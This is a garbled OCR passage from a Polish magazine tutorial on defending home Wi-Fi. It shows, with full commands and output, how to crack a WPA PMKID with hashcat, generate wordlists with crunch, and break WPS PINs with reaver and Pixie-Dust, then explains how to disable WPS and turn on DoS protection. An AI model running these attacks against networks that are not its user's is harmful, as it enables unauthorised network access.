klawiszy [dd]+([CJ. Na- 


pcapng 1.0 

x86 64 

capture device vendor information: 18d6c7 

file os information..............: Linux 5.3.0-kali2-amd64 
hcxdumptool 6.8.8 (custom options) 
DLT IEEE802 11 RADIO (127) 
little endian 

flawless 

03.01.2020 14:30:31 (GMT) 
03.01.2020 14:30:42 (GMT) 
31 


K A © 
stępnie konwertujemy 8 
plik z przechwyconymi RE 
pakietami do formatu 2 
obsługiwanego przez E > 

A probe responses 

hashcati sprawdzamy association responses.......... 1 
liczbę przechwyconych authentications (OPEN SYSTEM). 2 
ki tó W k ż authentications (BROADCOM)..... M 
pakietów $. WYKONUJE- | |eapoL packets (total)......... 21 
my polecenie: EAPOL packets (WPA2)........... 21 
PMKIDS (not zeroed - total)... 1 

sudo hcxpcaptool | |myrpi wma) 000 A 
-Z pmkid_plik1.16800 PMKIDS from access points..... 1 
best PHKIDS (total). 022u0-7 1 


pmkid_plik1.pcapng 


summary output file(s): 


1 PMKID(s) written to pmkid_plik1.16866 


krzysiekękali:-$ | 


POZNAJ METODY HAKERÓW 39 


adam1l3zajacigmail.com 


obrona przed atakami na sieć bezprzewodową 


krzysiekGkali:-$ cat pmkid plik1.16800 


44e82e8899f8153808bd11636d9befba*6045cb123b18*b025aaa0c236*546573745f4b53 


krzysiekekali:-$ |] 


Następnie sprawdzamy przechwycony 
pakiet PMKID, wpisując komendę: 
cat pmkid_plik1.16800 €. 


W jednej linijce będzie się znajdować 

jeden wpis. Zapis jest przedstawiony 
w formacie HEX. Dla nas ważna jest ostat- 
nia fraza, która zawiera nazwę ESSID sieci. 
Dzięki temu upewnimy się, że przechwy- 
cony został komunikat odpowiedniej sieci. 
Nazwę sieci możemy odszyfrować, wpisując 
polecenie: 
echo 546573745f4b53 | xxd -r -p; echo ©. 


sudo hashcat -m 16800 -a 0 -w 3 -o ”od- 
zyskane.txt” pmkid_plik1.16800 /usr/ 
share/wordlists/rockyou.txt ©, 

gdzie: 

z -m 16800 to typ szyfrowania/hashu, 

E-a 0 oznacza wybranie ataku słownikowego, 
E -w 3 oznacza wybranie wydajnego profilu 
-przyspiesza czas deszyfrowania, bardziej 
obciążając podzespoły, 

E-0 "odzyskane.txt" znaczy, że deszyfrowane 
hasło trafi do pliku o nazwie odzyskane.txt, 

z pmkid_plik1.16800 plik z hashem do 
odszyfrowania, 


Test KS 


krzysiekGkali:-$ echo 546573745f4b53 | xxd -r -p ; 


echo 


Pozostaje nam odszyfrowanie hasła. Wy- 
korzystamy w tym celu narzędzie hash- 
cat. Wykonujemy polecenie: 


z /usr/share/wordlists/rockyou.txt to 
ścieżka do słownika używanego do deszy- 
frowania hasła [zl. 


krzysiekękali:-$ sudo hashcat -m 16800 -a © -w 3 -o "odzyskane.txt" pmkid plik1.16860 /usr/share/wordlists/rockyou.txt 
[sudo] hasło użytkownika krzysiek: 
hashcat (v5.1.6) starting... 


Dictionary cache built: 


44e82e8899f8153808bd11636d9befba*6045cb123b18*b025a.. 


* Filename..: /usr/share/wordlists/rockyou.txt [J 
* Passwords.: 14344392 

* Bytes.....: 139921507 

* Keyspace..: 14344385 

* Runtime...: 1 sec 

SESSION. +««««s«««.2 NAShCAE 

SEBEUsS"<coc0a=222 2 Gracked 

Hash.Type........: WPA-PMKID-PBKDF2 


.5f4b53 


Hash.Target......: 
[Time.Started.....: Fri Jan 3 15:56:18 2020 (2 secs) 

: Fri Jan 3 15:56:20 20260 (© secs) 

: File (/usr/share/wordlists/rockyou.txt) 
1/1 (100.00%) 


Speed .F2.1c-% «0513 63020 H/s (80.88ms) © Accel:512 Loops:128 Thr:64 Vec:1 
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts 
ProgresSs.........: 387112/14344385 (2.70%) 

Rejected.........: 223272/387112 (57.68%) 


0/14344385 (0.00%) 

Salt:08 Amplifier:0-1 Iteration:0-1 

123456789 -> sunflower15 

Temp: 50c Util:100% Core:1176MHz Mem:2505MHz Bus:16 


Restore.Point....: 
Restore.Sub.42...: 
Candidates.42....: 
Hardware.Mon.ź=2..: 


Started: Fri Jan 3 15:56:04 2020 
Stopped: Fri Jan 3 15:56:21 2020 
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rzysiekekali:-$ sudo cat odzyskane.txt 


44e82e8899f8153808bd11636d9befba*6045cb123b18*b025aaa0c236*546573745f4b53:87654321 


krzysiekGkali:-$ 


i JOB JG pc c? 
Hasło w naszym przykładzie to 87654321 zaledwie 1034 H/s [H. Jest to prawie 61 razy 


i zostało odszyfrowane w 15 sekund. Może- 
my to sprawdzić, wpisując polecenie: 
sudo cat odzyskane.txt ©. 
Uwaga! Domyślnie nie będziemy mogli tak 
szybko testować zabezpieczeń, gdyż będzie 


szybciej w tym zestawieniu, a jest to dość 
mało wydajna karta grafiki z laptopa. Przy 
wydajnych modelach dostępnych na kom- 
putery stacjonarne hasła można dekodować 
jeszcze szybciej. 


w tym celu wykorzystywany nasz procesor 
(CPU), a nie karta graficzna (GPU). Jeśli chce- 
my korzystać z mocy obliczeniowej GPU, 
musimy przejść przez dodatkową konfigu- 
rację i instalację odpowiednich modułów 
oraz sterowników do karty grafiki. Warto to 
zrobić, gdyż różnice w czasie deszyfrowania 
są ogromne. W naszym przykładzie został 
wykorzystany procesor Intel i7-6700HQ E] 


WARTO PAMIĘTAĆ 


Niektóre routery w panelu administra- 
cyjnym mają opcję sieci dla gości. Warto 


z niej korzystać, by móc udostępniać 
domowe Wi-Fi, nie dając jednocześnie 
dostępu do naszych urządzeń i danych. 


oraz grafika GeForce GTX 
960M [E1. Przy poprzednich kro- 
kach można zaobserwować, że 
dla karty grafiki szybkość deszy- 
frowania wyniosła 63020 H/s, 
tymczasem dla procesora było to 


OpenCL Platform 42: The pocl project 


OpenCL Platform 43: NVIDIA Corporation 


* Device +2: GeForce GTX 960M, skipped. B 


AJ 
* Device 41: pthread-Intel(R) Core(TM) i7-6700HQ CPU 


SeSS1ON.«-<«c««:«2 NASNCHE 
STBEUS.----------* Cracked 
Hash.Type........: WPA-PMKID-PBKDF2 


44e82e8899f8153808bd11636d9befba*6045cb123b18*b025a...5f4b53 
Fri Jan 3 16:15:16 2020 (4 secs) 
Fri Jan 3 16:15:20 2020 (© secs) 
File (/usr/share/wordlists/rockyou.txt) 
1/1 (100.00%) 
[91034 H/s (68.06ms) © Accel:512 Loops:256 Thr:1 Vec:8 
1/1 (106.00%) Digests, 1/1 (100.00%) Salts 


Hash.Target......: 
Time.Started.....: 
[Time.Estimated...: 
MIESS.BBSE.--.-«.3 
IGuess.Queue......: 
Speed.F1-----:---3 
Recovered........: 


Korzystanie z karty graficznej 
w programie hashcat 


J eśli zamierzamy wykorzystać moc obli- 
czeniową karty graficznej do testowania 
zabezpieczeń, musimy zadbać o to, by miała 
odpowiednie sterowniki. To, że na monito- 
rze jest wyświetlany obraz, nie znaczy, że są 
zainstalowane poprawne sterowniki. Zawsze 
w przypadku zewnętrznych oraz zintegro- 
wanych kart graficznych konieczna jest ich 
instalacja. Dopiero po poprawnej instalacji 
driverów będziemy mogli korzystać z dodat- 
kowych możliwości karty, na przykład użyć 


jej mocy obliczeniowej w programie hashcat 
czy też hydra do sprawdzania zabezpieczeń. 
Różnice w czasie deszyfrowania są ogromne, 
więc warto przejść przez ten proces - zwłasz- 
cza wtedy, gdy mamy wydajną kartę graficzną. 
Uwaga! W przypadku systemu Kali Linux 
posiadacze kart GeForce nie powinni napo- 
tkać żadnych większych problemów. Co do 
kart firmy AMD, to obecnie nie istnieje pro- 
sta procedura umożliwiająca wsparcie mo- 
deli tego producenta w programie hashcat. 
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obrona przed atakami na sieć bezprzewodową 


rzysiekGćkali:-$ sudo apt install inxi 
[sudo] hasło użytkownika krzysiek: 
Czytanie list pakietów... Gotowe 
Budowanie drzewa zależności 
Odczyt informacji o stanie... Gotowe 
Następujące pakiety zostały zainstalowane automatycznie i nie są już więcej wym 
gane: 

libayatana-ido3-0.4-0 libbfiol libhogweed4 libnettle6 
Aby je usunąć należy użyć "sudo apt autoremove". 
The following additional packages will be installed: 

libglew2.1 mesa-utils tree 
Sugerowane pakiety: 

libcpanel-json-xs-perl | Llibjson-xs-perl libxml-dumper-perl glew-utils 
Zostaną zainstalowane następujące NOWE pakiety: 

inxi libglew2.1 mesa-utils tree 
0 aktualizowanych, 4 nowo instalowanych, © usuwanych i 61 nieaktualizowanych. 
Konieczne pobranie 515 kB archiwów. 
Po tej operacji zostanie dodatkowo użyte 1 917 kB miejsca na dysku. 
Kontynuować? [T/n] T 


Alternatywą dla użytkowników kart AMD system. Robimy to podobnie jak w Windows, 
jest zapisanie hashy do zdekodowania i uru- gdzie taką czynność możemy wykonać w Me- 
chomienie programu hashcat w systemie _ nedżerze urządzeń. 
Windows, dla którego istnieją odpowiednie 
sterowniki umożliwiające poprawną pracę Instalujemy w Terminalu narzędzie inxi 
tego programu. przez komendę sudo apt install inxi 

i zatwierdzamy samą instalację klawiszem M. 
Identyfikacja sprzętu 
Zanim zaczniemy szukać sterowników i je Potem wykonujemy komendę inxi -b ©, 
instalować, warto sprawdzić, jaki sprzęt z na- dzięki czemu poznamy podstawowe in- 
szego komputera jest rozpoznawany przez formacje o urządzeniach w komputerze. 


krzysiekcćkali:-$ inxi -b 
System: 
Host: kali Kernel: 5.3.0-kali2-amd64 x86 64 bits: 64 Desktop: Xfce 4.14.1 
Distro: Kali GNU/Linux 2019.4 
Machine: 
Type: Desktop Mobo: Micro-Star model: B450 TOMAHAWK MAX (MS-7C02) v: 1.0 
serial: <root required> UEFI [Legacy]: American Megatrends v: 3.30 
date: 09/17/2019 
CPU: 
6-Core: AMD Ryzen 5 3600 type: MT MCP speed: 3588 MHz 
Graphics: 
Device-1: AMD Navi 10 [Radeon RX 5700 / 57060 XT] driver: N/A 
Display: x11 server: X.Org 1.20.6 driver: ati,vesa 
unloaded: fbdev,modesetting, radeon resolution: 1920x1080-N/A 
OpenGL: renderer: llvmpipe (LLVM 9.6 128 bits) v: 3.3 Mesa 19.2.6 
Network: 
Device-1: Realtek RTL8111/8168/8411 PCI Express Gigabit Ethernet 
driver: r8169 
Drives: 
Local Storage: total: 5.01 TiB used: 15.42 GiB (0.3%) 
Info: 
Processes: 256 Uptime: 18m Memory: 15.65 GiB used: 2.86 GiB (18.3%) 
Shell: bash inxi: 3.0.37 
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Teraz warto zwró- |57aPhics: 


cić uwagę, czy 


Device-1: Intel HD Graphics 5360 driver: i915 v: kernel 
Device-2: NVIDIA GM107M [GeForce GTX 960M] driver: nvidia 


chociaż karta graficz- 
na została wstępnie rozpoznana, przy pozycji 
driver nie ma wpisu N/A - wskazywałoby to 
na brak zainstalowanego sterownika dla kar- 
ty graficznej. W naszym przykładzie sterow- 
niki już wcześniej zostały zainstalowane 


Instalujemy sterowniki 

Poznajmy teraz proces instalacji sterowników 
NVIDIA dla kart GeForce, które bez więk- 
szych problemów są wspierane przez system 
Kali Linux i obsługiwane przez narzędzia do 
penetracji. 


Zaczynamy od wykonania poleceń do 

aktualizacji i instalacji nowych pakietów 
oraz najnowszego jądra systemu, po którego 
instalacji konieczne jest ponowne urucho- 
mienie systemu: 


nvidia-smi [J, które pozwoli na sprawdze- 
nie, czy sterownik został poprawnie załado- 
wany i czy karta jest rozpoznawana. 


Teraz możemy przystąpić do sprawdze- 
nia, czy hashcat rozpoznaje naszą kartę 
[]. Wykonujemy polecenie: 
sudo hashcat -I 


Następnie możemy uruchomić benchmark, 
wpisując polecenie sudo hashcat -b 


Jeśli nasza karta przejdzie proces bench- 

marku, możemy korzystać z jej mocy ob- 
liczeniowej do dekodowania różnego rodzaju 
haseł. W kolejnych rozdziałach pozwoli to na 
znaczne skrócenie czasu testów. 


Platform ID 3 


sudo apt update 8:8. sudo apt dist-upgrade 


Vendor : NVIDIA Corporation 
-y 8.6: reboot LJ. Name : NVIDIA CUDA 
Version : OpenCL 1.2 CUDA 16.1.120 


Po ponownym uruchomieniu systemu Device ID 42 


instalujemy dodatkowe narzędzia oraz Type : GPU [D 
t ik. Wyk . l sk; Vendor ID JI > 
sam sterownik. Wykonujemy polecenie: Vendor : NVIDIA Corporation 
sudo apt install -y ocl-icd-libopenci1 Name : GeForce GTX 966M 
nvidia-driver nvidia-cuda-toolkit E]. KCUEŁCI 3 GTEREL M2 Gu 
Processor(s) 2.5) 
Clock : 1176 
Przy tej instalacji będzie od nowa kom- Memory : 1011/4046 MB allocatable 


OpenCL Version 
Driver Version 


: OpenCL C 1.2 


pilowane jądro systemu, więc konieczny > ZE an 


jest restart komputera. Gdy system się uru- 
chomi, w Terminalu wpisujemy polecenie 


krzysiekekali:-$ |] 


[<rzysiekekali:-$ sudo apt update 66 sudo apt dist-upgrade -y 66 rebootlj[y 


jkrzysiekekali :-$ sudo apt install -y ocl-icd-libopencl1 nvidia-driver nvidia-cuda-toolkit|[[] 


krzysiekGkali:-$ nvidia-smi [H] 
Fri Jan 3 16:40:45 2020 


CUDA Version: 10.1 | 


| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | 
| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | 
| © GeForce GTX 960M off | 00000000:01:00.0 Off | N/A | 
| N/A  36C P8 N/A / N/A | OMiB / 4046MiB | 0% Default | 
doddtdoddddeddododdddododododdododdodododiyj | dodddddoddddoddodododdododododddiyi | ddododdododddodddoddododododdi + 
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obrona przed atakami na sieć bezprzewodową 


Tryb autentykacji połączenia 


bezprzewodowego 


Szyfrowanie WPA 


WPA Pre-shared Key 


wPA2-Persona| 

open System 
WPA2-Personal 
WPA-Auto-Persona | 
wPA2-Enterprise 
WPA-Auto-Enterprise 


Nowy router bez wsparcia dla szyfrowania WEP 


+ WEP 


Key 1 
Key 2 
Key 3 


Kcy 4: 


Type: 
WEP Key Hormat: 


Key Selected 


Automatic M 


Hexadecimal * 


WEP Key Key Type 

Haslohasio| | 128bk + 
Disabled v 
Disabled v 
Disabled v 


Router starszej generacji, który umożliwia zabezpieczenie sieci 


szyfrowaniem WEP 


Tworzenie słowników 


rzy poprzednich testowych atakach ko- 

rzystaliśmy jedynie z domyślnego goto- 
wego słownika. Warto nauczyć się przygo- 
towywać własne słowniki, które umożliwią 
lepsze testowanie zabezpieczeń. Możemy na 
przykład utworzyć słownik składający się tyl- 
ko z konkretnych fraz lub, znając niektóre 
litery hasła, możemy odpowiednio dostoso- 
wać nasz słownik. W systemie Kali Linux 
bardzo dobrze z generowaniem słowników 
radzi sobie program erunch. 


Składnia programu crunch wygląda tak: 
crunch <min> <max> [options] 

Możemy znacznie bardziej rozbudować wy- 
konywane polecenia - jest to tylko podsta- 
wowy układ składni. 

Poniżej widzimy kilka różnego rodzaju przy- 
kładów wykorzystania programu erunch. 
Tu tworzymy hasła o długości ośmiu znaków 
(możemy też podać różne wartości, na przy- 
kład 6 i 10), które składają się tylko z cyfr: 
crunch 8 8 0123456789 -o slownikścyfry.txt 


:-$ crunch 8 8 0123456789 -o slowniksścyfry.txt 
Crunch will now generate the following amount of data: 900000000 bytes 


858 MB 
0 GB 
0 TB 
0 PB 


Crunch will now generate the following number of lines: 


100000000 
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.it) 


numeric-space 


symbols14 
symbols14-space 


symbols-all 
symbols-all-space 


ualpha 
ualpha-space 


.com> 
hex- Lower = [0123456789abcdef] 
hex-upper = [0123456789ABCDEF|] 
numeric [0123456789] 


[0123456789 |] 


[!64$%"6*()-_+=] 
[!64$%"6*()-_+= | 


[!£$%06*()-_+=— [ILYJN:;"'<>,.?/]1 
[!E£$%6*()-_+=— [IfYJMN:;"'<>,.7/ 1 


[ABCDEFGHIJKLMNOPQRSTUVWXYZ] 
[ABCDEFGHIJKLMNOPQRSTUVWXYZ ] 


rzysiekekali:-$ cat /usr/share/crunch/charset.lst 
if charset configuration file for winrtgen v1.2 by Massimiliano Montoro (maoGoxid 


If compatible with rainbowcrack 1.1 and later by Zhu Shuanglei <shuangleiGhotmail 


Nie musimy za każdym razem wpisywać 
wszystkich znaków, jakie mają być ujęte 
w generowanym słowniku w Terminalu. 
Możemy skorzystać z gotowego pliku ze 
zdefiniowanymi ciągami znaków charset. 
Ist, który znajduje się w lokalizacji /ust/ 
share/crunch/charset.lst © - wystarczy 
przy generowaniu słowników odwołać się 
do odpowiedniego ciągu z tego pliku. 

Tak więc komenda crunch 8 8 -f /usr/share/ 
crunch/charset.lst numeric -o slownik 
_cyfry2.txt © pozwoli na utworzenie dokład- 
nie takiego samego słownika jak w przypadku 
ręcznego wprowadzenia wszystkich znaków. 
Jest to znacznie wygodniejsze, zwłaszcza gdy 
chcemy wprowadzać różnego rodzaju ciągi 
znaków, na przykład małe lub duże litery iinne. 


Możemy również tworzyć różnego rodzaju 
słowniki wykorzystujące wzorce. 

Tego typu słowniki są dość często wyko- 
rzystywane, ponieważ pozwalają dodatko- 
wo stosować elementy ataków typu social 
engineering, w trakcie których można 
zdobyć cenne informacje na przykład na 
temat urodzin osoby, która tworzyła hasło. 
Możemy wtedy stworzyć słownik składa- 
jący się z 10 znaków, gdzie cztery ostatnie 
znaki to rok urodzenia. Parametr -t oznacza 
korzystanie z wzorca, gdzie wszystkie znaki 
oznaczone jako © mogą przyjmować dowol- 
ną formę, a pozostałe znaki są stałe - w tym 
przypadku 1987: 

crunch 10 10 -t ©©©©©-©1987 -o slow- 
nik1987.txt 


krzysiekekali:-$ crunch 8 8 -f /usr/share/crunch/charset.lst numeric -o slownik _cyfry2.txt 


Crunch will now generate the following amount of data: 900000000 bytes 


858 MB 


Crunch will now generate the following number of lines: 


crunch: 76% compleled generaling oulpul 


crunch: 100% completed generating output 


100000000 


krzysiekGkali:-$ crunch 10 10 -t E€GGGGG1987 -o slownik1987.txt 
Crunch will now generate the following amount of data: 3398073536 bytes 


3240 MB 
3 GB 
0 TB 
O PB 


Crunch will now generate the following number of lines: 308915776 
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-rw-r--r-- 1 krzysiek krzysiek 3399MB sty 3 23:48 slownik1987.txt 
-rw-r--r-- 1 krzysiek krzysiek 7T900MB sty 3 18:33 slownikścyfry.txt 
-rw-r--r-- 1 krzysiek krzysiek | 900MB sty 3 18:44 slownik cyfry2.txt 
-rw-r--r-- 1 krzysiek krzysiek 7MB sty 3 18:43 slownik cyfry.txt 
drwxr-xr-x 2 krzysiek krzysiek 1MB gru 28 13:04 Szablony 
-rw-r--r-- 1 krzysiek krzysiek 1MB sty 3 15:28 targets.txt 
drwxr-xr-x 2 krzysiek krzysiek 1MB gru 28 13:04 Wideo 

drwxr-xr-x 8 krzysiek krzysiek 1MB sty 2 16:56 xf86-video-ati 
krzysiekGkali:-$ |] 


Słowniki mogą zajmować bardzo dużo miej- 
sca na dysku. Możemy je skompresować, 
a dopiero przed skorzystaniem z nich - roz- 
pakowywać. Dodatkowo niektóre programy 
radzą sobie podczas dekodowania również 
ze skompresowanymi słownikami. Możemy 
też od razu utworzyć skompresowany słow- 
nik, podając dodatkowy parametr -z gzip 
w celu skompresowania do formatu GZ: 
crunch 10 10 -t ©QQQQG1999 -z szip 
-0 slownik1999.txt ©. 


Najwięcej przestrzeni dyskowej zaoszczę- 
dzimy jednak, kompresując pliki z wykorzy- 
staniem formatu 7Z, chociaż wtedy proces 
tworzenia słownika będzie znacznie dłuższy. 
7z a slownik1987.7z slownik1987.txt - z tej 
komendy możemy skorzystać w celu utworze- 
nia archiwum 72 z istniejących już plików. 
Różnice w rozmiarach plików są ogromne, 
z około 3399 MB rozmiar został zredukowany 
do około 36 MB w przypadku formatu 7Z i do 
718 MB w przypadku GZ ©- 


krzysiekkali:-$ crunch 10 10 -t GGGGGG1999 -z gzip -o slownik1999.txt 
Crunch will now generate the following amount of data: 3398073536 bytes 


PAZ OEZOZZOZ ZZO ZOORZZ RZEZBA 
-rw-r--r-- 1 krzysiek krzysiek 
-rw-r--r-- (1 krzysiek krzysiek 
-Fw-Tr--r-- 


36MB 
3399MB 


1 krzysiek krzysiek| 718MB 


4 00:04 slownik1987.7z 
3 23:48 slownik1987.txt 
4 00:06 slownik1999.txt.gz 


ty 
ty 
ty 


Testujemy bezpieczeństwo Wi-Fi z WPS 


decydowana większość routerów dostęp- 

nych w sprzedaży ma funkcję WPS (Wi-Fi 
Protected Setup). Umożliwia ona połączenie się 
z routerem bez konieczności wpisywania hasła. 
W praktyce możemy połączyć się, korzystając 
z jednej z dwóch metod - pierwsza polega na 
wpisaniu specjalnego kodu PIN WPS umiesz- 
czonego na obudowie routera w urządzeniu, 
które chcemy podłączyć do sieci, a druga na 
wciśnięciu specjalnego przycisku WPS na ru- 
terze i podłączonym urządzeniu. 
W większości routerów dostępnych na rynku 
przycisk WPS znajduje się z tyłu obudowy i jest 
odpowiednio oznaczony ©. 
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AC karty sieci bezprzewodowej 


Wireless - WPS 


enia RADIUS Prol Roaming Block List 


WPS (Wi-Fi Protected Setup [Ustawienia zbepieczenia Wi-Fi]) udostępnia łatwe i bezpieczne ustalanie sieci bezprzewodowej. 


WPS możn skonfigurować tu, przez kod PIN lub przycisk WPS. 


Aktualna częstotliwość 


Status połączenia 


Skunfiguruwanie 


encrypiion key. 


Kod PIN AP 12345b6/U 


name (SSID) and 


work name (SSID) and WPA 


Klienta mażna łatwn padłączyć dn sieci, jednym 7 dwóch nadanych nadanych spasohów 


* Metoda 1: Kliknij przycisk WPS interfejsu (lub naciśnij fizyczny przycisk WPS na routerze), a następnie naciśnij przycisk 


WPS na adapterze WLAN klienta i zaczekaj trzy minuty na nawiązanie połączenia. 


Metoda 2: Uruchom proces klienta WPS i uzyskaj kod PIN klienta. Wprowadź kod PIN klienta w polu Client PIN (PIN 
klienta) i kliknij Start. Sprawdź podręcznik użytkownika klienta bezprzewodowego. aby sprawdzić, czy obsługuje on 
funkcję WPS. Jeśli klient bezprzewuuuwy nie obsługuje funkcji WPS, należy skunfiguruwać klienta bezp zewuuuwegu 


ręcznie i ustawić tę samą nazwę sicci (SSID) oraz ustawienia zabezpieczenia jak w tym routerze. 


Uwaga! Bardzo wiele routerów ma domyśl- 
nie aktywną funkcję WPS © - może być ona 
słabym punktem w ochronie naszej sieci. 


Jeśli ustalimy bardzo długie i skomplikowa- 
ne hasło do naszej sieci bezprzewodowej, to 
nadal nie będziemy bezpieczni, gdyż ataku- 
jący po porażce przy próbie złamania hasła 
do sieci będzie mógł spróbować złamać kod 
PIN WPS i w ten sposób uzyskać dostęp do 


sieci. Niektóre routery mają z góry ustalone 
kody PIN według specjalnych algorytmów - 
wtedy jeszcze prościej jest je odszyfrować. 
W 2011 roku badacz bezpieczeństwa Stefan 
Viehbóck odkrył wadę implementacji kodu 
PIN dla WPS. Koncepcja, którą wprowadził, 
opierała się na następujących faktach: 
Spośród ośmiu cyfr kodu PIN ostatnia cy- 
fra jest tylko sumą kontrolną, a zatem jest 
siedem cyfr do sprawdzenia. 
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m PIN jest sprawdzany przez podzielenie go 
na dwie połowy. Tak więc pierwsza po- 
łowa to 10* = 10 000 możliwości, a druga 
to 103 = 1000 możliwości. Daje to w su- 
mie tylko 11 000 możliwości, a według 
założeń początkowych powinno ich być 
10* = 100 000 000 możliwości. 

W ostatnich latach znaleziono jeszcze więcej 

słabości, które znacznie skracają cały atak. 

Obecnie przyjmuje się, że w pesymistycznym 

przypadku podatny router może być złamany 

w ciągu 10 godzin. 


Testowy atak WPS 
Zaczynamy od uruchomienia trybu mo- 
nitora na naszej kompatybilnej karcie 
sieciowej. Wykonujemy polecenie: 
sudo airmon-ng start wlani ©. 


deszyfrowanie WPS jest trudne ze względu na 
różne możliwości sprzętowe routerów. 


Received M5 
Received M5 
Received M5 
Received M7 
Sending WSC 
Sending WSC NACK 

Pin cracked in 22 seconds 
WPS PIN: '02523835' 

WPA PSK: 'TrudnelHaslo2"' 
AP SSID: 'Test_KS" 


[+] 
[+] 
[+] 
[+1 
[+] 
[+1 
[+1 
[+] 
[+] 
[+1 


message 
message 
message 
message 
NACK 


Po uzyskaniu prawidłowego kodu PIN 
wystarczy uruchomić drugą część testo- 
wego ataku komendą: 
sudo reaver -i wlanimon -b [adres MAC 


krzysiekekali:-$ sudo airmon-ng start wlanl 


[sudo] hasło użytkownika krzysiek: 


rutera] -p [znaleziony kod PIN] -vv 
--no-nack -d 5 -f 


Następnie korzystamy z dostępnego 
w systemie Kali Linux narzędzia Wash, 
które pozwala znaleźć sieci Wi-Fi i określić 
ich status WPS: 
sudo wash -i wlanimon ©. 


Taki test trwa już zaledwie kilka sekund 

i pozwala na uzyskanie hasła do testowa- 
nej sieci. Nieważne, jak jest długie, można je 
odczytać, deszyfrując kod PIN WPS. 


Jak się zabezpie- 


krzysiekGkali:-$ sudo wash -i wlanlmon 


BSSID ch dBm WPS Lck 
F4:30:B9:E9:0C:C6 6 -79 2.6 Yes 
EJ 

(60:45:CB:12:3B:18 6 -62 2.6 No 

D4:6E:0E:6D:80:F7 1 -91 2.6 No 


Vendor 


Broadcom  DIRECT-( 


Broadcom Test KS 
RalinkTe TP-LINK 


czyć przed atakiem 
na WPS 

Jak widać, przy aktyw- 
nej funkcji WPS ist- 
nieje bardzo wysokie 
prawdopodobieństwo 


ESSID 


Jeśli w kolumnie Lek przy danej sieci jest 

informacja Yes 6, nie będzie można zde- 
kodować zabezpieczeń. Jeżeli będzie status No, 
możemy uruchomić test poprzez komendę: 
reaver -i wlan1imon -b [adres MAC rutera] 
-c [kanał] -vvv -K 1 -f ©. 
Flaga -K -1 oznacza dodatkowo aktywowanie 
testowego ataku Pixie-Dust, który w przypad- 
ku podatnych routerów pozwoli ograniczyć 
czas deszyfrowania z 10 godzin do kilku minut. 
Jeśli nasz router nie jest na niego podatny, musi- 
my uruchomić test ataku bez tej flagi. Czasami 


złamania zabezpieczeń 
routera i poznania hasła do sieci. Można za- 
bezpieczyć się przed tym atakiem na kilka 
sposobów. Możemy na przykład ustawić 
filtrowanie MAC, ale jak już wiemy, ataku- 
jący z odpowiednią wiedzą po chwili może 
zmienić adres MAC swojej karty. Dlatego też 
jedynym skutecznym i pewnym sposobem 
na ochronę naszej sieci jest zablokowanie 
funkcji WPS w naszym routerze. 


W zależności od producenta i modelu 
proces ten może wyglądać różnie, ale 


krzysiekekali :-$ sudo reaver -i wlanlmon 


-b 60:45:CB:12:3B:18 -c 6 -vvv -K 1 -B 
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Wireless - WPS 


WPS (Wi-Fi Protected Setup [Ustawienia zbepieczenia Wi-Fi]) udostępnia łatwe i bezpieczne ustalanie sieci bezprzewodowej. 
WPS możn skonfigurować tu, przez kod PIN lub przycisk WPS. 


Włącz WPS 

Aktualna częstotliwość 
Status połączenia Not used 
Skonfigurowane Tak 


Kuu PIN AP 02523835 


zawsze trzeba znaleźć w ustawieniach 
sieci bezprzewodowych zakładkę lub 
opcję WPS 


Następnie przełączamy funkcję WPS tak, 
by miała status OFF 


Zabezpieczenie 


Ogólne 


Częstotliwość 
przełączania 


Po zapisaniu zmian 

nasza sieć nie będzie 
widoczna przy skanowa- 
niu narzędziem Wash 
i nie będzie podatna na atak programem 
reaver. 


WPS WDS 


przed atakami DDoS na Wi-Fi de 


stnieje również ryzyko, że nasza sieć zo- 

stanie poddana atakowi DDoS lub innemu 
typu DoS. Atak DoS polega na zablokowaniu 
dostępu do urządzenia, serwisu lub usługi. 
Jest wykonywany z jednego urządzenia, 
a DDoS - z wielu (DDoS jest to atak rozpro- 
szony). Celem ataku DDoS na Wi-Fi jest zablo- 
kowanie routera lub jego komponentów, na 


Firewall - Ogólne 


przykład sieci bezprzewodowej przez zaję- 
cie wszystkich wolnych zasobów. Klasyczny 
atak DDoS jest przeprowadzany z zewnątrz, 
atakującemu wystarcza poznanie zewnętrz- 
nego adresu IP naszego routera. Następnie 
atakujący, wykorzystując wiele różnych 
stacji roboczych (najczęściej z botnetu), 
przeprowadza atak mający na celu przecią- 


Włącz firewall w celu zabezpieczenia sieci lokalnej przed atakami hakerów. Firewall filtruje przychodzące i wychodzące pakiety w 


oparciu o reguły filtrowania. 


Uruchomić firewall O Tak © Nie 


Odbiokować zabczpicczcenia przed atakami A o CJ 
DoS Tak © Nie 


Typ logowanych pakietów żaden. " 


Odpowiadaj na PING z sieci WAN B © Tak O Nie 


Zastosuj 
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żenie routera, zajmując jego pamięć, CPU 
itp. Może to doprowadzić do zawieszenia, 
restartu lub wyłączenia urządzenia. 


Jak się obronić przed takim 
atakiem? 

Niestety, nie ma możliwości obrony 
przed odpowiednio przygotowanym 
atakiem DDoS w środowisku domowym, 
gdzie użytkownik nie ma dostępu do spe- 
cjalnych sprzętowych firewalli. Jedyne, co 
można zrobić, to - w wypadku droższych 
modeli routerów - aktywować funkcję 


Zabezpieczenie przed atakami 
typu DoS: ICMP, UDP i TCP 


S ą to rodzaje ataków DoS, które mogą zatrzy- 
mać działanie routera (poznany wcześniej 
atak DDoS to odmiana DoS). Ataki ICMP, UDP 
iTCP polegają na wykorzystaniu różnego rodza- 
ju pakietów do „zalania” naszego urządzenia, 
tak by przestało odpowiadać. Część routerów 
po aktywowaniu funkcji Zabezpieczenia przed 
atakami DoS chroni tylko przed jednym pod- 
stawowym rodzajem ataku. Bardziej zaawanso- 
wane urządzenia pozwalają na skonfigurowa- 
nie ochrony bardziej precyzyjnie. 


Na przykład w przypadku routerów 
Tp-Link z nowym oprogramowaniem 


8 Ustawienia USB 


- Ustawienia 


Lista zablokowanych hostów DoS 


ochrony przed atakiem DoS. Domyślnie jest 
ona wyłączona, bo obciąża procesor routera. 


W panelu administracyjnym routera prze- 
chodzimy do zakładki Firewall. 


Aktywujemy Firewall oraz funkcję Od- 
blokować zabezpieczenia przed atakami 
DoS [l 


Dodatkowo zablokujmy też Odpowiadaj 
na PING z sieci WAN [E] (często wykorzy- 
stuje się PING właśnie do ataku). 


« 


(s 


<a 


przechodzimy do zakładki Zaawansowane, 
Zabezpieczenia, Ustawienia, gdzie może- 
